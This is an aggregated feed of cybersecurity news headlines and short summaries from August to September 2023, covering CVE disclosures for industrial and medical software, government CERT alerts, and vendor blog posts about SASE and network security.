CWE-256: Plaintext Storage of a Password The affected product stores usernames and passwords in plaintext. The plaintext storage could be abused by attackers to leak legitimate user’s credentials. Softneta recommends users update to v7.2.9.820 of MedDream PACS Server or patch their current system using Fix-v230712.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39227
CVE-2023-40150
2023-09-05T10:26:00Z | 1693909560

CWE-749: Exposed Dangerous Method or Function The affected product does not perform an authentication check and performs some dangerous functionality, which could result in unauthenticated remote code execution. Softneta recommends users update to v7.2.9.820 of MedDream PACS Server or patch their current system using Fix-v230712.

https://claroty.com/team82/disclosure-dashboard/cve-2023-40150
Vulnerability in lua-http library
2023-09-05T09:00:00Z | 1693904400

CERT Poland has received a report about vulnerability in the lua-http Library and assigned it the number CVE-2023-4540.

https://cert.pl/en/posts/2023/09/CVE-2023-4540/
Open Automation Software OAS Platform OAS Engine configuration management improper resource allocation vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1773
Open Automation Software OAS Platform OAS Engine authentication bypass vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1769
Open Automation Software OAS Platform OAS Engine authentication bypass vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1776
Open Automation Software OAS Platform OAS Engine authentication bypass vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1770
Open Automation Software OAS Platform OAS Engine User Creation improper input validation vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1772
Open Automation Software OAS Platform OAS Engine configuration file write vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1771
Open Automation Software OAS Platform OAS Engine configuration management information disclosure vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1775
Open Automation Software OAS Platform OAS Engine configuration management information disclosure vulnerability
2023-09-05T00:00:00Z | 1693872000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1774
Single Vendor SASE vs. the Alternatives: Navigating Your Options
2023-09-04T12:08:22Z | 1693829302

SASE sets the design guidelines for the convergence of networking and security as a cloud service. With SASE, enterprises can achieve operational simplicity, reliability, and adaptability. Unsurprisingly, since Gartner defined SASE in 2019, vendors have been repositioning their product offerings as SASE. So, what are the differences between the recommended single-vendor SASE approach and other... The post Single Vendor SASE vs. the Alternatives: Navigating Your Options appeared first on Cato Networks.

https://www.catonetworks.com/blog/single-vendor-sase-vs-the-alternatives-navigating-your-options/
Security Alert (A23-09-01): Vulnerability in Microsoft Edge
2023-09-04T04:00:00Z | 1693800000

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Media IT Leaders Say Distributed Cloud Will Boost Performance, Lower Cost
2023-09-01T13:00:00Z | 1693573200

https://www.akamai.com/blog/cloud/media-it-leaders-say-distributed-cloud-will-boost-performance-lower-cost
RIA osales USA korraldatud Põhjamaade küberkaitseõppusel
2023-09-01T10:19:47Z | 1693563587

RIA esindus võttis sel nädalal osa rahvusvahelisest küberturbeõppusest, mille korraldas USA rahandusministeerium koostöös Soome kolleegidega, et suurendada Põhjala riikide pangandussektori vastupidavust rünnetele.

https://ria.ee/uudised/ria-osales-usa-korraldatud-pohjamaade-kuberkaitseoppusel
CVE-2023-39981
2023-09-01T09:59:00Z | 1693562340

A vulnerability that allows for unauthorized access has been discovered in MXsecurity versions prior to v1.0.1. This vulnerability arises from inadequate authentication measures, potentially leading to the disclosure of device information by a remote attacker.

https://claroty.com/team82/disclosure-dashboard/cve-2023-39981
CVE-2023-39980
2023-09-01T09:58:00Z | 1693562280

A vulnerability that allows the unauthorized disclosure of authenticated information has been identified in MXsecurity versions prior to v1.0.1. This vulnerability arises when special elements are not neutralized correctly, allowing remote attackers to alter SQL commands. This is caused by the improper design or implementation of authentication mechanisms and input validation. Exploiting these vulnerabilities could enable an attacker to bypass authentication, which could lead to the unauthorized disclosure or tampering of authenticated information, unauthorized access to sensitive data, and remote access without proper authorization

https://claroty.com/team82/disclosure-dashboard/cve-2023-39980
CVE-2023-39979
2023-09-01T09:55:00Z | 1693562100

There is a vulnerability in MXsecurity versions prior to 1.0.1 that can be exploited to bypass authentication. A remote attacker might access the system if the web service authenticator has insufficient random values. This is caused by the improper design or implementation of authentication mechanisms and input validation. Exploiting these vulnerabilities could enable an attacker to bypass authentication, which could lead to the unauthorized disclosure or tampering of authenticated information, unauthorized access to sensitive data, and remote access without proper authorization

https://claroty.com/team82/disclosure-dashboard/cve-2023-39979
New Cyber Security Conference Announced For 2024
2023-09-01T00:00:00Z | 1693526400

Open CSIRT Foundation and FIRST join forces to bring European cyber security experts together in Spain

https://www.first.org/newsroom/releases/20230901
New Cyber Security Conference Announced For 2024
2023-09-01T00:00:00Z | 1693526400

Open CSIRT Foundation and FIRST join forces to bring European cyber security experts together in Spain

https://www.first.org/newsroom/releases/20230901
The NCSC announces Ollie Whitehouse as new CTO
2023-08-31T22:37:29Z | 1693521449

Ollie Whitehouse has been announced as the new CTO of the National Cyber Security Centre.

https://www.ncsc.gov.uk/news/ollie-whitehouse-new-ncsc-cto
UK and allies support Ukraine calling out Russia's GRU for new malware campaign
2023-08-31T16:34:23Z | 1693499663

Malware, dubbed Infamous Chisel, enables unauthorised access to compromised Android devices.

https://www.ncsc.gov.uk/news/uk-allies-support-ukraine-calling-out-russia-gru-malware-campaign
Understanding International Revenue Share Fraud
2023-08-31T13:00:00Z | 1693486800

https://www.akamai.com/blog/security/understanding-international-revenue-share-fraud
Kuidas E-ITSi kasutada? Valminud on uus e-koolitus!
2023-08-31T11:07:06Z | 1693480026

RIA on kokku pannud e-kursuse „E-ITS rakendamine: kaitsetarbest rakendusplaanini“, mis on mõeldud eelkõige avaliku sektori töötajatele, kes vastutavad infoturbe strateegia elluviimise eest.

https://ria.ee/uudised/kuidas-e-itsi-kasutada-valminud-uus-e-koolitus
Achieving NIS2 Compliance: Essential Steps for Companies
2023-08-31T10:40:24Z | 1693478424

Introduction In an increasingly digital world, cybersecurity has become a critical concern for companies. With the rise of sophisticated cyber threats, protecting critical infrastructure and ensuring the  continuity of essential services has become a top priority. The EU’s Network and Information Security Directive (NIS2), which supersedes the previous directive from 2016, establishes a framework to... The post Achieving NIS2 Compliance: Essential Steps for Companies  appeared first on Cato Networks.

https://www.catonetworks.com/blog/achieving-nis2-compliance-essential-steps-for-companies/
Publicado Boletim 3.2023 do Observatório de Cibersegurança
2023-08-31T00:00:00Z | 1693440000

A terceira edição de 2023 do Boletim do Observatório de Cibersegurança analisa o estado atual da execução da Estratégia Nacional de Segurança do Ciberespaço (ENSC) 2019-2023, enquadrando-a no contexto da União Europeia, e aborda o processo em curso de desenvolvimento de uma nova ENSC. Como sempre, o Boletim é uma oportunidade para divulgar também algumas publicações e notícias de interesse. Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135792/publicado-boletim-32023-do-observatorio-de-ciberseguranca
Data Science-Fueled Tagging From GreyNoise Last Week
2023-08-31T00:00:00Z | 1693440000

GreyNoise tags come from extremely talented humans who painstakingly craft detection rules for emergent threats that pass our “100%” test every time. Last week was bonkers when it comes to the number of tags (7) our team cranked out. Check out this blog to see why.

https://www.greynoise.io/blog/data-science-fueled-tagging-from-greynoise-last-week
Qakbot Takedown: A Brief Victory in the Fight Against Resilient Malware
2023-08-30T16:26:27Z | 1693412787

Prior botnet takedowns like Emotet and TrickBot have shown that sophisticated malware operations, like Qakbot, can often rebuild infrastructure and return from disruptions in new forms The post Qakbot Takedown: A Brief Victory in the Fight Against Resilient Malware appeared first on Flashpoint.

https://flashpoint.io/blog/qakbot-takedown/
The Challenge of Securing APIs for a Luxury Hotel Chain
2023-08-30T13:00:00Z | 1693400400

https://www.akamai.com/blog/security/securing-apis-for-a-luxury-hotel-chain
SASE Instant High Availability and Why You Should Care
2023-08-30T09:03:35Z | 1693386215

High availability may be top of mind for your organization, and if not, it really should be. The cost range of an unplanned outage ranges from $140,000 to $540,000 per hour.  Obviously, this varies greatly between organizations based on a variety of factors specific to your business and environment. You can read more on how... The post SASE Instant High Availability and Why You Should Care  appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-instant-high-availability-and-why-you-should-care/
Security Alert (A23-08-19): Multiple Vulnerabilities in Firefox
2023-08-30T04:00:00Z | 1693368000

Mozilla has published the advisories (MFSA2023-34, MFSA2023-35 and MFSA2023-36) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-08-20): Vulnerability in Google Chrome
2023-08-30T04:00:00Z | 1693368000

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
DDoS Attacks Surge Against Vulnerable Assets: Are You Prepared?
2023-08-29T13:00:00Z | 1693314000

https://www.akamai.com/blog/security/ddos-attacks-surge-against-vulnerable-assets
Secure your Apollo GraphQL server with Semgrep
2023-08-29T12:00:14Z | 1693310414

tl;dr: Our publicly available Semgrep ruleset has nine new rules to detect misconfigurations of versions 3 and 4 of the Apollo GraphQL server. Try them out with semgrep –config p/trailofbits! When auditing several of our clients’ Apollo GraphQL servers, I kept finding the same issues over and over: cross-site request forgery (CSRF) […]

https://blog.trailofbits.com/2023/08/29/secure-your-apollo-graphql-server-with-semgrep/
IntelMQ 3.2.1 bug fix released
2023-08-29T09:53:36Z | 1693302816

IntelMQ, an open-source security feeds processing tools, has just got a new release to fix two recently discovered bugs. One was introduced in the last 3.2.0 and prevents bots from stopping after being reloaded. As reloading is used in our default configuration for logrotate service, it affects most instances with the IntelMQ 3.2.0. If after the upgrade you still cannot stop your bot, please manually kill the bot's process and start it again. The second bug was discovered in the Reverse DNS Expert bot, which was incorrectly caching findings for one IP as if they were for the /24-prefixed subnet. As usuall, you can get the last IntelMQ from GitHub, PyPI, deb repository and Docker Hub. Unfortunately, the 3.2.x API package for Ubuntu 22.04 is still delayed. Do not hesitate to share your feedback with the IntelMQ Community on GitHub issues or the IntelMQ users mailing list. This blog post is part of a series of blog posts related to our 2020-AT-IA-0254 project, which also support our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2023/8/intelmq-321-bug-fix-released
The National Cyber Security Centre Finland’s weekly review – 34/2023
2023-08-29T08:57:59Z | 1693299479

Email users are being plagued by active phishing. Stay vigilant! Your alarm bells should start ringing if a secure email link opens a page that asks for your username and password.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-342023
The National Cyber Security Centre Finland’s weekly review – 34/2023
2023-08-29T08:57:59Z | 1693299479

Email users are being plagued by active phishing. Stay vigilant! Your alarm bells should start ringing if a secure email link opens a page that asks for your username and password.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-342023
Back to School Reminder - Keep Your Mac Clean!
2023-08-28T21:57:20Z | 1693259840

Key points from our research: Around early-mid August, we noticed an increase in MacOS malware detections, specifically AdLoad and UpdateAgent in IronDome, in the education sector. This timing correlates with students returning to school, therefore bringing their personal (infected) devices to school networks, and is likely the cause of this increase. Our CyOC discovered previously unreported IOCs relating to AdLoad and UpdateAgent, including HTTP User Agents, HTTP Paths, and domains. Additionally, some IOCs discovered have been reported since 2019, which indicates the techniques the threat actors are using have been around for years and continue to compromise systems. These IOCs are available in the Appendix section. IronDefense was able to detect this activity via multiple different analytics, including our Suspicious File Download, Beaconing, and Domain Analysis behavioral analytics. IronDome correlated this activity together and uncovered five more enterprises affected.

https://www.ironnet.com/blog/back-to-school-reminder-keep-your-mac-clean
Cisco and Nutanix Forge Global Strategic Partnership to Simplify Hybrid Multicloud and Fuel Business Transformation
2023-08-28T20:05:00Z | 1693253100

Global strategic partnership aims to accelerate customers’ hybrid multicloud adoption, foster innovation, and provide seamless customer experience.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m08/cisco-and-nutanix-announce-strategic-partnership.html
You Are a Woman in Tech: Own Your Voice
2023-08-28T13:00:00Z | 1693227600

https://www.akamai.com/blog/culture/you-are-a-woman-in-tech-own-your-voice
Cisco’s platform strategy: a simple, secure, single pane of glass
2023-08-28T12:00:00Z | 1693224000

Cisco’s Networking Cloud and Security Cloud offer powerful capabilities while reducing complexity.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m08/cisco-platform-strategy-a-simple-secure-single-pane-of-glass.html
iVerify is now an independent company!
2023-08-28T11:00:45Z | 1693220445

We’re proud to announce that iVerify is now an independent company following its four-year incubation at Trail of Bits. Originally developed in-house to ensure that our personal phones, which store data essential to our work and private lives, were secured to the standards of security professionals, iVerify quickly showed that it could be valuable to […]

https://blog.trailofbits.com/2023/08/28/iverify-is-now-an-independent-company/
Riisalo: siht on järgmisteks valimisteks luua võimalus hääletada nutiseadmega
2023-08-28T07:20:31Z | 1693207231

Majandus- ja infotehnoloogiaminister Tiit Riisalo tutvustas valitsuskabinetile m-valimiste hetkeseisu ning vajalikke samme, et 2024. aasta Euroopa Parlamendi valimistel oleks võimalik hääletada valimisrakendusega nutitelefonis.

https://ria.ee/uudised/riisalo-siht-jargmisteks-valimisteks-luua-voimalus-haaletada-nutiseadmega
Cyber weather in July had some rain caused by vulnerabilities
2023-08-28T07:09:08Z | 1693206548

Cyber criminals don’t have days off, so many kinds of events were seen in the world of information security in July. For example, several critical vulnerabilities were made public last month. Additionally, online banking details were diligently phished in the name of banks and the suomi.fi service.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_07/2023
Cyber weather in July had some rain caused by vulnerabilities
2023-08-28T07:09:08Z | 1693206548

Cyber criminals don’t have days off, so many kinds of events were seen in the world of information security in July. For example, several critical vulnerabilities were made public last month. Additionally, online banking details were diligently phished in the name of banks and the suomi.fi service.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_07/2023
Security Alert (A23-08-17): Vulnerability in Apache Tomcat
2023-08-28T04:00:00Z | 1693195200

The Apache Software Foundation released a security update to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-08-18): Multiple Vulnerabilities in Microsoft Edge
2023-08-28T04:00:00Z | 1693195200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST Impressions Podcast featured in Feedspot Top 10 Incident Response Podcasts
2023-08-28T00:00:00Z | 1693180800

FIRST Impressions Podcast has been selected as one of the Top 10 Incident Response Podcasts on the web. The FIRST Impressions podcast brings you regularly scheduled content focused on discussions from across the incident response and security spectrum. Hosted by Chris John Riley and Martin McKeay, new episodes released first Friday of the month!

https://blog.feedspot.com/incident_response_podcasts/
Connecting Employees Through the Power of Reuse
2023-08-25T07:00:00Z | 1692946800

https://www.akamai.com/blog/sustainability/connecting-employees-through-the-power-of-reuse
Security Alert (A23-08-16): Multiple Vulnerabilities in QNAP Products
2023-08-25T04:00:00Z | 1692936000

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Safeguard Medical Devices: New H-ISAC Guidance on Cusp of FDA Rule
2023-08-24T13:00:00Z | 1692882000

https://www.akamai.com/blog/security/safeguard-medical-devices-new-h-isac-guidance-fda-rule
Corsa Security Collaborates with Exordior to Deliver New Managed Virtual Firewall Services
2023-08-24T13:00:00Z | 1692882000

Push-button orchestration of software firewalls efficiently scales network security to meet requirements of Exordior customers Corsa Security, leaders in scaling network security, today announced it has entered into an agreement with Exordior Group, the Singapore headquartered leading managed security service provider having its direct presence across APAC and EMEA region, to offer a hosted, managed virtual […] The post Corsa Security Collaborates with Exordior to Deliver New Managed Virtual Firewall Services appeared first on Corsa Security.

https://www.corsa.com/2023/08/24/corsa-security-collaborates-with-exordior-to-deliver-new-managed-virtual-firewall-services/
Security Alert (A23-08-15): Multiple Vulnerabilities in Cisco Products
2023-08-24T04:00:00Z | 1692849600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Top 3 Benefits MSSPs & MDRs Receive With GreyNoise
2023-08-24T00:00:00Z | 1692835200

Many traditional threat intelligence solutions used by MSSPs can have an unintended consequence of creating more noise for your security operations center (SOC) – GreyNoise changes that. In this post, we will take a deeper look at exactly HOW existing GreyNoise MSSP customers are realizing these benefits.

https://www.greynoise.io/blog/top-3-benefits-mssps-mdrs-receive-with-greynoise
3 Steps to Elevate Your Cybersecurity in a Post-Pandemic World
2023-08-23T13:00:00Z | 1692795600

As cybercrime grows more sophisticated in the remote work era, you can take three essential steps to fortify your organization against evolving threats.

https://www.akamai.com/blog/security/3-steps-elevate-cybersecurity-post-pandemic-world
The National Cyber Security Centre Finland’s weekly review – 33/2023
2023-08-23T11:27:40Z | 1692790060

This summer has seen the public disclosure of several critical software vulnerabilities. Has your organisation made sure to keep systems updated and patched even during the summer holidays?

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-332023
The National Cyber Security Centre Finland’s weekly review – 33/2023
2023-08-23T11:27:40Z | 1692790060

This summer has seen the public disclosure of several critical software vulnerabilities. Has your organisation made sure to keep systems updated and patched even during the summer holidays?

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-332023
The Engineer’s Guide to Blockchain Finality
2023-08-23T11:00:53Z | 1692788453

Many security-critical off-chain applications use a simple block delay to determine finality: the point at which a transaction becomes immutable in a blockchain’s ledger (and is impossible to “undo” without extreme economic cost). But this is inadequate for most networks, and can become a single point of failure for the centralized exchanges, […]

https://blog.trailofbits.com/2023/08/23/the-engineers-guide-to-blockchain-finality/
Traditional WAN vs. SD-WAN: Everything You Need to Know
2023-08-23T06:26:02Z | 1692771962

The corporate WAN connects an organization’s distributed branch locations, data center, cloud-based infrastructure, and remote workers. The WAN needs to offer high-performance and reliable network connectivity to ensure all users and applications can communicate effectively.  As the WAN expands to include SaaS applications and cloud data centers, managing this environment becomes more challenging. Companies reliant... The post Traditional WAN vs. SD-WAN: Everything You Need to Know  appeared first on Cato Networks.

https://www.catonetworks.com/blog/traditional-wan-vs-sd-wan-everything-you-need-to-know/
Security Alert (A23-08-13): Multiple Vulnerabilities in Google Chrome
2023-08-23T04:00:00Z | 1692763200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-08-14): Vulnerability in WinRAR
2023-08-23T04:00:00Z | 1692763200

RARLAB has released a security update to fix a vulnerability in WinRAR.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai World Tour 2023: Let?s Connect on Security and Cloud Innovation
2023-08-22T13:00:00Z | 1692709200

https://www.akamai.com/blog/news/akamai-world-tour-2023
The Magic Quadrant for Single Vendor SASE and the Cato SASE Experience
2023-08-22T11:00:05Z | 1692702005

Customer experience isn’t just an important aspect of the SASE market, it is its essence. SASE isn’t about groundbreaking features. It is about a new way to deliver and consume established networking and security features and to solve, once and for all, the complexity and risks that has been plaguing IT for so long. This... The post The Magic Quadrant for Single Vendor SASE and the Cato SASE Experience appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-magic-quadrant-for-single-vendor-sase-and-the-cato-sase-experience/
Security Alert (A23-08-12): Multiple Vulnerabilities in Microsoft Edge
2023-08-22T04:00:00Z | 1692676800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
GreyNoise NoiseFest 2023 CTF Recap
2023-08-22T00:00:00Z | 1692662400

The GreyNoise Labs team is proud to have hosted the GreyNoise NoiseFest 2023 CTF - who knows if we will do it again, but we had fun, so here’s a walkthrough on how and why we did it.

https://www.greynoise.io/blog/greynoise-noisefest-2023-ctf-recap
Alerta CERT.PT: Campanhas de engenharia social
2023-08-21T00:00:00Z | 1692576000

O CERT.PT tem registado diversas campanhas de engenharia social, através do envio de emails, que visam a alteração de dados bancários relacionados com pagamentos correntes de várias entidades. Estes emails são — ou aparentam ser — enviados de contas de correio eletrónico conhecidas dos destinatários (como fornecedores de produtos e serviços mais habituais), surgindo, por vezes, como resposta a conversas anteriores. Nalguns casos são apresentados ficheiros comprovativos de alteração de contas bancárias. Caso receba um email a solicitar a alteração de dados bancários: Confirme se o endereço coincide com o remetente com o qual normalmente contacta ou se corresponde, efetivamente, à entidade anunciada; Não realize operações bancárias solicitadas por email, nem altere dados bancários, sem antes verificar através de outros canais a veracidade do pedido, confirmando (por exemplo, telefonicamente) se realmente está a ser solicitado esse procedimento (nota: não utilizar o contacto telefónico mencionado no conteúdo do email, mas sim o contacto habitualmente utilizado da entidade ou pessoa); Aplique a mesma regra caso lhe solicitem dados sensíveis e/ou pessoais (por exemplo, a palavra-passe de uma conta). Por regra, evite partilhar estes dados através de email ou colocá-los em plataformas partilhadas em links de emails não verificados por si. Desconfie de emails com erros formais de linguagem, mas também não confie em todos os emails, apenas porque não apresentam estes erros; Não clique nos links ou nos anexos existentes em emails suspeitos; Denuncie junto dos responsáveis de segurança informática da organização ou junto das autoridades competentes, sempre que é alvo ou vítima de um email suspeito; Aplique estas regras também aos contactos telefónicos, aos SMS e às mensagens instantâneas. Por último, notificar o CERT.PT (cert@cert.pt) ou através do formulário, caso recebam emails deste género para que possamos registar a evolução da campanha e indicar as medidas de mitigação a adotar.Saiba mais sobre boas práticas contra o Phishing, o Smishing e o Vishing.

https://dyn.cncs.gov.pt/pt/detalhe/art/135791/alerta-certpt-campanhas-de-engenharia-social
Recurring Themes Present (And Missing) From Hacker Summer Camp
2023-08-21T00:00:00Z | 1692576000

In this post we break down some of the broader themes from Black Hat and DEF CON 2023 and pull out some recurring themes across each that would cause some consternation for CISOs, CIOs, CEOs, and board members.

https://www.greynoise.io/blog/recurring-themes-present-and-missing-from-hacker-summer-camp
CVE-2023-32202
2023-08-17T16:02:00Z | 1692288120

CWE-287: Improper Authentication: Walchem Intuition 9 firmware versions prior to v4.21 are vulnerable to improper authentication. Login credentials are stored in a format that could allow an attacker to use them as-is to login and gain access to the device.

https://claroty.com/team82/disclosure-dashboard/cve-2023-32202
CVE-2023-38422
2023-08-17T16:01:00Z | 1692288060

CWE-306: Missing Authentication for Critical Function: Walchem Intuition 9 firmware versions prior to v4.21 are missing authentication for some of the API routes of the management web server. This could allow an attacker to download and export sensitive data.

https://claroty.com/team82/disclosure-dashboard/cve-2023-38422
Akamai Develops Real-Time Detections for DNS Exfiltration
2023-08-17T13:00:00Z | 1692277200

https://www.akamai.com/blog/security/akamais-real-time-detections-for-dns-exfiltration
The New Network Dictionary: AvidThink Explains SASE, SD-WAN, SSE, ZTNA, MCN, and NaaS
2023-08-17T09:16:14Z | 1692263774

The enterprise networking and security market has seen no end to terms and acronyms. SASE, of course, is chief among them, but let us not forget SD-WAN, SSE, ZTNA, and Multi-Cloud Networking (MCN). Then we get into specific capabilities like CASB, DLP, SWG, RBI, FWaaS, and micro-segmentation. This alphabet soup of jargon can confuse even... The post The New Network Dictionary: AvidThink Explains SASE, SD-WAN, SSE, ZTNA, MCN, and NaaS   appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-new-network-dictionary-avidthink-explains-sase-sd-wan-sse-ztna-mcn-and-naas/
Security Alert (A23-08-11): Multiple Vulnerabilities in Cisco Products
2023-08-17T04:00:00Z | 1692244800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato named a Leader in Forrester’s 2023 Wave for Zero Trust Edge
2023-08-16T16:00:00Z | 1692201600

Today, Forrester released The Forrester Wave™: Zero Trust Edge Solutions, Q3 2023 Report. Zero Trust Edge (ZTE) is Forrester’s name for SASE. We were delighted to be described as the “poster child” of ZTE and SASE and be named a “Leader” in the report.    To date, thousands of enterprises with tens of thousands of... The post Cato named a Leader in Forrester’s 2023 Wave for Zero Trust Edge    appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-named-a-leader-in-forresters-2023-wave-for-zero-trust-edge/
Akamai Defends Against the OWASP Top 10 API Security Risks
2023-08-16T13:00:00Z | 1692190800

https://www.akamai.com/blog/security/akamai-defends-against-owasp-top-10-api-security-risks
The National Cyber Security Centre Finland’s weekly review – 32/2023
2023-08-16T11:18:23Z | 1692184703

Recently, criminals have started to register scam websites in Finland’s national .fi domain as well. The aim of these websites has been to exploit the good reputation of the .fi domain to phish for people’s bank credentials.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-322023
The National Cyber Security Centre Finland’s weekly review – 32/2023
2023-08-16T11:18:23Z | 1692184703

Recently, criminals have started to register scam websites in Finland’s national .fi domain as well. The aim of these websites has been to exploit the good reputation of the .fi domain to phish for people’s bank credentials.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-322023
RIA korraldas tüdrukutele rahvusvahelise küberturbe laagri
2023-08-16T10:23:25Z | 1692181405

Riigi Infosüsteemi Amet (RIA) korraldas 7.–12. augustini Raplamaal Kehtnas rahvusvahelise noortelaagri Cyberwizards, et populariseerida tüdrukute seas küberturvalisuse teemasid.

https://ria.ee/uudised/ria-korraldas-tudrukutele-rahvusvahelise-kuberturbe-laagri
NB! Palun kontrollige oma riikliku e-postkasti suunamist
2023-08-16T07:24:44Z | 1692170684

Juhul kui kasutate eesti.ee-s riikliku postkasti edasisuunamiseks aadresse @hot.ee, @online.ee, @suhtlus.ee, @neti.ee, @estpak.ee, @solo.ee, @estnet.ee või @vnet.ee ega plaani alates 05.09.2023 tasulisele e-postile üle minna, siis palun vahetage suunamine.

https://ria.ee/uudised/nb-palun-kontrollige-oma-riikliku-e-postkasti-suunamist
Security Alert (A23-08-10): Multiple Vulnerabilities in Google Chrome
2023-08-16T04:00:00Z | 1692158400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Updated Kmsdx Binary Shows KmsdBot Is Targeting the IoT Landscape
2023-08-15T14:00:00Z | 1692108000

https://www.akamai.com/blog/security-research/updated-kmsdbot-binary-targeting-iot
Carlsberg Selects Cato, the “Apple of Networking,” for Global SASE Deployment
2023-08-15T12:00:00Z | 1692100800

Today, we announced that Carlsberg, the world-famous brewer, has selected Cato SASE Cloud for its global deployment. It’s a massive SASE deployment spanning 200+ locations and 25,000 remote users worldwide, replacing a combination of MPLS services, VPN services, SD-WAN devices, remote access VPNs, and security appliances.   The mix of technologies meant that Carlsberg faced the... The post Carlsberg Selects Cato, the “Apple of Networking,” for Global SASE Deployment  appeared first on Cato Networks.

https://www.catonetworks.com/blog/carlsberg-selects-cato-the-apple-of-networking-for-global-sase-deployment/
SS8 Partners with Internet Watch Foundation to Offer Hash List in Intellego XT
2023-08-15T08:45:33Z | 1692089133

Working together, to prevent further access to criminal imagery of children. MILPITAS, Calif. – August 15, 2023– SS8 Networks, a leader in Lawful and Location Intelligence and Monitoring center platforms, today announced their partnership with the Internet Watch Foundation (IWF) to help expand the effort to remove online child sexual abuse material (CSAM). The partnership […] The post SS8 Partners with Internet Watch Foundation to Offer Hash List in Intellego XT appeared first on SS8.

https://www.ss8.com/ss8-partners-with-internet-watch-foundation-to-offer-hash-list-in-intellego-xt/
Riigiportaalis eesti.ee võidi kuvada teiste inimeste andmeid
2023-08-14T12:10:09Z | 1692015009

Täna, 14. augustil ajavahemikul 9.48–9.53 oli tehnilise vea tõttu võimalik riigiportaalis www.eesti.ee näha teise inimese andmeid: nime, e-posti aadressi, telefoninumbrit ja infot seotud ettevõtete kohta. Võõra inimese andmeid võis näha ligikaudu 300 inimest, kes olid sel ajavahemikul ennast portaali sisse loginud.

https://ria.ee/uudised/riigiportaalis-eestiee-voidi-kuvada-teiste-inimeste-andmeid
Juuli küberruumis: võltskuulutused, petuskeemid ja teenustõkestusründed
2023-08-14T09:06:11Z | 1692003971

Suurema osa RIA poolt juulis registreeritud küberintsidentidest moodustasid tavapäraselt õngitsuslehed, kuid jätkusid ka teenustõkestusründed riigiasutuste veebilehtede vastu, küberrünne tabas üht haiglat ning Facebooki Marketplace'i keskkonnast avastati arvukalt võltskuulutusi ja petuskeeme.

https://ria.ee/uudised/juuli-kuberruumis-voltskuulutused-petuskeemid-ja-teenustokestusrunded
Can you pass the Rekt test?
2023-08-14T08:00:50Z | 1692000050

One of the biggest challenges for blockchain developers is objectively assessing their security posture and measuring how it progresses. To address this issue, a working group of Web3 security experts, led by Trail of Bits CEO Dan Guido, met earlier this year to create a simple test for profiling the security of blockchain teams. We […]

https://blog.trailofbits.com/2023/08/14/can-you-pass-the-rekt-test/
How to Enhance Your Network Security Strategy
2023-08-14T07:51:38Z | 1691999498

With the transition to the cloud and remote work, some organizations are undervaluing network security. However, network vulnerabilities and threats still require attention. Enterprises should not forgo the core capabilities required to secure the network from security threats. In this blog post, we delve into SASE, a converged, cloud-delivered network and security solution, which protects... The post How to Enhance Your Network Security Strategy appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-enhance-your-network-security-strategy/
Enterprise Strategy Group Report: SSE Leads the Way to SASE
2023-08-13T13:15:49Z | 1691932549

The post Enterprise Strategy Group Report: SSE Leads the Way to SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/enterprise-strategy-group-report-sse-leads-the-way-to-sase/
Cato SASE Cloud: A Two-Time Leader and Outperformer in GigaOm’s Radar Report for Secure Service Access
2023-08-13T11:56:50Z | 1691927810

